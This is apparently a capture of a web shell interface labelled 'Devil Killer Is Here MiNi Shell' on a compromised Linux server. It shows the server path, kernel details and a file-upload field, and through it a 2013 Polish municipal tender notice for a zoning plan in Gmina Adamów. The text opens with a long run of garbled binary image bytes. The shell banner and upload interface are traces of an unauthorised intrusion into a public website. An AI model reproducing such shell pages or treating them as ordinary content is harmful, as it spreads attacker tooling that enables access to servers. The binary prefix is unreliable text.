JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130208/53798-N-2013.html

<p class="kh_header"><b>Adamów: Zmiany w Miejscowym Planie Zagospodarowania Przestrzennego Gminy Adamów</b><br>
<b>Numer ogłoszenia: 53798 - 2013; data zamieszczenia: 08.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Adamów , Adamów 11b, 22-442 Adamów, woj. lubelskie, tel. +48-084-6186102, faks +48-084-6187715.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adamow.bip.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiany w Miejscowym Planie Zagospodarowania Przestrzennego Gminy Adamów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie projektu miejscowego planu zagospodarowania przestrzennego Gminy Adamów, dla Gminy Adamów w jej granicach administracyjnych, określone w Uchwale Nr XXV/160/09 Rady Gminy Adamów z dnia 13 luty 2009 r. oraz w Uchwale XX/115/12 z dnia 16 lipca 2012 r. w sprawie uchwalenia zmian Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Adamów.
Miejscowy plan zagospodarowania przestrzennego należy sporządzić zgodnie z wymogami ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity: Dz. U. z 2012 r.,poz. 647 ) i rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. 03.164.1587 ) wraz z przeprowadzeniem strategicznej oceny oddziaływania na środowisko zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2008 r. Nr 199, poz. 1227 ze zm.). Plan należy sporządzić w oparciu o ustalenia obowiązującego studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Adamów.
Zamawiający nie przewiduje żadnych spotkań, odbycie wizji oraz zapoznanie się z posiadaną dokumentacją będącą w posiadaniu zamawiającego a mogącą mieć wpływ na składaną ofertę, pozostawia się w gestii wykonawcy
Obszar opracowania wstępnego: 488,20 ha 
Skala opracowania:zgodna  zprzepisami prawa, sugestia zamawiającego 1:2000
Obręby Gminy Adamów;
Adamów - 80,23 ha, ilość działek 63
Bliżów - 41,08, ilość działek 27
Bondyrz - 30,74 ha, ilość działek 82
Czarnowoda - 6,05 ha, ilość działek 1
Grabnik - 16,45 ha, ilość działek 8
Feliksówka - 1,54 ha, ilość działek 2
Jacnia - 68,46 ha, ilość działek 146
Potoczek - 38,82 ha, ilość działek 27
Rachodoszcze - 12,65 ha, ilość działek 25
Suchowola - 160,66 ha, ilość działek 167
Szewnia Dolna - 5,09 ha, ilość działek 3
Szewnia Górna - 4,63 ha, ilość działek 4
Trzepieciny - 21,80 ha, ilość działek 36, powyższe dane wynikają z zapisów ,,Kierunki zagospodarowania przestrzennego,, zamieszczonego w Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Adamów. Ilość działek może odbiegać od stanu faktycznego, spowodowane sytuacjami związanymi z ewentualnymi zmianami w ewidencji gruntów lub z wynikających rozbieżności spowodowanymi zapisami tekstu a mapą graficzną związanymi ze Studium Uwarunkowań i Kierunków Zagospodarowania  Przestrzennego Gminy Adamów - zmian.  
4   Zakres czynności do wykonania leżący po stronie Wykonawcy:
4.1.	przygotowanie uchwał, obwieszczeń i zawiadomień,
4.2.	sporządzenie inwentaryzacji zakresu rzeczowo- ilościowego 
4.3.	reprezentowanie Wójta Gminy Adamów przy przeprowadzaniu uzgodnień i uzyskiwanie opinii do projektu planu,
4.4.	sporządzenie prognozy oddziaływania na środowisko,
4.5.	sporządzenie prognozy skutków finansowych uchwalenia planu,
4.6.	przygotowanie wniosku o wyrażenie zgody na zmianę przeznaczenia gruntów na cele nierolnicze i nieleśne,
4.7.	przygotowanie projektu uchwały w ramach procedury sporządzania planu oraz wszystkich innych dokumentów związanych z pracami planistycznymi,
4.8.	prezentowanie projektu planu na posiedzeniu komisji urbanistyczno-architektonicznej, komisji i sesji Rady Gminy Adamów oraz udział głównego projektanta planu w czasie wyłożenia projektu planu do publicznego wglądu i w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami,
4.9.	analiza i opracowanie propozycji rozpatrzenia przez Wójta Gminy Adamów uwag wniesionych w   związku z wyłożeniem projektu planu i prognozy oddziaływania na środowisko do   publicznego wglądu,
4.10.	wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag,
4.11.	przygotowanie materiałów na sesję Rady Gminy Adamów, uchwalającą plan,
4.12.	wprowadzenie do projektu planu zmian wynikających z uzgodnień z właściwymi organami i rozstrzygnięć Rady Gminy Adamów,
4.13.	przygotowanie dokumentacji planistycznej w formie książkowej( papierowej) oraz elektronicznej, obejmującej  problematykę wymaganą przez Wojewodę w celu oceny zgodności z prawem,
4.14.	wprowadzenie do uchwały zatwierdzającej plan zmian wynikających z rozstrzygnięć nadzorczych Wojewody,
4.15.	opracowanie podsumowania i uzasadnienia, o którym mowa w art. 42 i art. 55 ust. 3 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2008 r. Nr 25, poz. 150 ze zm.)
4.16.	 uzyskanie numerycznej mapy terenu objętego sporządzanym planem,
5.	Zakres opracowania dokumentacji planistycznej oraz ostatecznej:
5.1.	trzy egzemplarze prognozy oddziaływania na środowisko,
5.2.	dwa egzemplarze dokumentacji planistycznej w formie książkowej, obejmującej problematykę wymaganą przez Wojewodę w celu oceny zgodności z prawem,
5.3.	dwa egzemplarze tekstu i rysunku planu w technice umożliwiającej jego publikację 
w Dzienniku Urzędowym Województwa Lubelskiego,
5.4.	dwa egzemplarze zafoliowanego rysunku planu w skali 1:2000,
5.5.	jeden egzemplarz zafoliowanego rysunku planu w technice barwnej w skali 1:5000,
5.6.	cztery egzemplarze tekstu planu w formie książkowej,
5.7.	cztery egzemplarze rysunku i tekstu planu w wersji elektronicznej na nośniku optycznym (postać tekstową w formacie DOC, postać graficzną w formie: rastrowej w plikach o rozszerzeniu JPG i TIFF w rozdzielczości 600 DPI. 
6.Po stronie Zamawiającego leżą koszty związane z publikacją ogłoszeń i prowadzoną  korespondencją wynikającą z procedury planistycznej.
7. Zamawiający udostępni Wykonawcy niezbędne materiały będące w jego dyspozycji:
1)	uchwałę Rady Gminy Adamów o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego Gminy Adamów,
2)	studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Adamów,
3)	obowiązujące miejscowe plany zagospodarowania przestrzennego Gminy Adamów,
4)	gminną ewidencję zabytków,
5)	program opieki nad zabytkami Gminy Adamów.
8.  Wykonawca zobowiązany jest  do zwrotu wszystkich przekazanych materiałów po zakończeniu prac związanych z wykonaniem przedmiotu umowy bez ich rozpowszechniania. 
-Wójt Gminy Adamów stosownie do przepisów art. 17 pkt 1 i 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity: Dz. U. z 2012 r.,poz. 647 )  ogłosi w prasie miejscowej, przez obwieszczenia, a także w sposób zwyczajowo przyjęty oraz zawiadomi instytucje i organy właściwe do uzgadniania i opiniowania planu o podjęciu uchwały o przystąpieniu do sporządzenia planu.
-Wójt Gminy Adamów stosownie do przepisów art. 53 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (DZ. U. z 2008 r. Nr 199, poz. 1227  ze zm.) wystąpi o uzgodnienie zakresu i stopnia szczegółowości informacji wymaganych  w prognozie oddziaływania na środowisko.
9. Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających.
10. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom: wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Powyższe oparte jest na zapisach Art.36  ust.4 UPzp, informację taka zamawiający żąda do wskazania w załączniku do niniejszej SIWZ.
11. Wymagania stawiane wykonawcy:
1)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
2)	Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
3)	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
4)	Określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
5)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia.
6)	Zamawiający nie stawia szczególnych wymagań organizacyjnych stawianych wykonawcy dla realizacji przedmiotu zamówienia objętego niniejszym postepowaniem.
12. Wymagania dot. Gwarancji -  zamawiający zabezpiecza swoje prawa objęte gwarancją dla wykonania przedmiotu zamówienia, oparte o zapisy Kodeksu cywilnego, zamawiający wymaga gwarancji udzielonej przez wykonawcę nie krótsza jak 24 miesiące, od ostatecznego oddania dzieła..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje wniesienia zabezpieczenia należytego wykonania umowy w wysokości 2000,00 zł.
W sprawach wadium zastosowanie mają Art. 45 i At. 46 Ustawy Pzp
W przypadku wniesienia wadium w pieniądzu, należy kwotę wadium przelać na Nr konta bankowego 47963900092002005001220014</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia; Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 usługi w zakresie odpowiadającym jak przedmiot zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający uszczegółowia warunek wiedzy i doświadczenia dla wykonawców ubiegających się o ubieganie się  o udzielenie niniejszego zamówienia publicznego; przez wymóg doświadczenia zamawiający rozumie wykonanie należycie prac związanych z opracowaniem zmiany Miejscowego Planu Zagospodarowania Przestrzennego, gdzie zakres prac  usług planowania przestrzennego obejmował min 300 ha dla jednej realizacji
Na podstawie treści wymaganych oświadczeń i dokumentów, zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie ,,spełnia-nie spełnia,, wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>uprawnienia do samodzielnego projektowania przestrzeni w skali regionalnej i lokalnej lub kierowania zespołem prowadzącym takie projektowanie oraz posiadającą aktualny wpis na listę właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.) - będącą głównym projektantem planu,
 uprawnienia zawodowe w zakresie szacowania nieruchomości oraz posiadającą aktualny wpis do centralnego rejestru rzeczoznawców majątkowych i podlegającą obowiązkowemu ubezpieczeniu odpowiedzialności cywilnej za szkody wyrządzone w związku z wykonywaniem czynności, o których mowa w art. 174 ust. 3 i 3a ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j.: Dz. U. z 2010 r.  Nr 102, poz. 651 z późn. zm.) - sporządzającą prognozę skutków finansowych albo wykazanie, że wykonawca dysponuje albo będzie dysponował osobą/osobami/ posiadającą/ymi/ odpowiadające ww. uprawnieniom kwalifikacje zawodowe, które zostały uznane na zasadach określonych w przepisach odrębnych.
Na podstawie treści wymaganych oświadczeń i dokumentów, zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie ,,spełnia-nie spełnia,, wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik nr 6 do niniejszej SIWZ.
2.  Zapisy Art. 144 ust.1 ustawy stosuje się odpowiednio, a mają zastosowanie wyłącznie w 	formie pisemnej pod rygorem jej nieważności, zawartej pomiędzy zamawiającym a 	wykonawcą z zastosowaniem dla;
2.1. zmiana wynagrodzenia, 
2.2. zmiana terminu wykonania prac,
2.3. pozostałe ustalenia.

Ad.2.1
2.1.1. Zmiana wynagrodzenia wykonawcy zamawiający nastąpi w sposób obligatoryjny. Zamawiający podpisze umowę z wykonawcą przedstawiającym najkorzystniejszą ofertę  zgodną z wymogami SIWZ. 
Zmiana wynagrodzenia w stosunku do wynagrodzenia wynikającego z ceny ofertowej, będzie wyliczona w sposób proporcjonalny do dwóch miejsc po przecinku wyrażoną w PLN w odniesieniu do faktycznie wykonanej pracy związanej ze zmianą w miejscowym planem zagospodarowania przestrzennego Gminy Adamów. Obliczenie wynagrodzenia będzie polegała na  wyliczeniu iloczynu ceny ofertowej za 1ha x faktyczna powierzchnia gruntów objętych pracami planistycznymi.

 Ad.2.2
2.2.1.Wykonawca za pisemnym zajęciem pozytywnego stanowiska zamawiającego, na wniosek wykonawcy może ubiegać się o skrócenie terminu wykonania zamówienia. 
2.2.2.W przypadku przewidywanego wydłużenia terminu wykonania prac wskazanych w harmonogramie, o którym mowa  w dz. XVI ust.3 SIWZ RIG 271.1.2013 a nie leżących po stronie wykonawcy np. związanymi ze sprawami administracyjnymi, prawnymi, uzyskaniem opinii - musi zwrócić się do zamawiającego pisemnie o przedłużenie terminu z podaniem przyczyny i terminem wydłużenia czasu wykonania umowy.   

Ad.2.3; 
2.3.1. Zawierane umowy w sprawach zamówień publiczny zgodnie z postanowieniami Art. 139 ustawy stosuje się przepisy ustawy z dnia 23 kwietnia 1964 r. Kodeksu cywilnego, wobec powyższego zamawiający dopuszcza zmiany zawartej umowy mające bezpośredni wpływ na jej ważność tylko w przypadku zmian regulacji prawnych obowiązujących po dniu podpisania umowy, w zakresie mających wpływ na wynagrodzenia dostawcy, zakresu usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.adamow.bip.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Adamów, Adamów 11b, 22-442 Adamów -pokój Nr 8.</p>
